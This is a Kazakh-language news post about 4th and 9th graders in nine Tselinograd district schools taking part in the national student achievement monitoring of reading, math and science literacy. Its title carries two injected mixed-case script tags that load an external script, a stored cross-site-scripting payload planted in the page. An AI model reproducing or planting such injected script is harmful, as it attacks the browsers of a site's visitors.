Оқушылар білім алушылардың білім жетістіктерінің мониторингіне қатысады<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

11.04.2025

Оқушылар білім алушылардың білім жетістіктерінің мониторингіне қатысады 

🗓 15-25 сәуір аралығында Целиноград ауданы бойынша білім бөлімі іріктірілген  9 мектебінде 472,
 4-ші және 9-шы сынып оқушылары қатысатын білім алушылардың білім жетістіктерінің мониторингі (ББЖМ) басталды. 

🎯 ББЖМ-бұл оқушылардың білім сапасын бағалауға бағытталған ұлттық Қазақстандық зерттеу құралы. Ол оқу бағдарламаларының тиімділігін талдауға, оқу-тәрбие процесіндегі күшті және әлсіз тұстарды анықтауға мүмкіндік береді. Оның түпкі нәтижесі – білім сапасын арттыру үшін әр өңірге кешенді талдау жасай отырып, әдістемелік ұсыныстар әзірлеу болып табылады.

♻ Мониторинг функционалдық сауаттылықтың үш бағытын бағалайды: оқу, математикалық және жаратылыстану. Оқушылар компьютерлерде тестілеуден өтеді. 

✍Сонымен қатар, ББЖМ аясында білім беру жетістіктері үшін әртүрлі контексттік факторларды анықтау үшін сауалнама жүргізіледі. Сауалнамаларды оқушылар, педагогтер, мектеп басшылары және 4-сынып оқушыларының ата-аналары толтырады.

✅ Мониторинг жүргізу рәсімі стандартталған және халықаралық тәсілдерге сәйкес ұйымдастырылған. Естеріңізге сала кетейік, 2025 жылдың басында ББЖМ халықаралық RCEC – сапа белгісін алды. Бұл сенімділігін, шынайылығын және халықаралық сапа стандарттарына сәйкестігін растайды.

❗Анықтама: ББЖМ нәтижелері тек диагностикалық болып табылады.

Әдістемелік кабинет әдіскері  С.Тасыбай

Просмотров: 1374


Пікір қосу



Деректерді қолтаңбаға қосу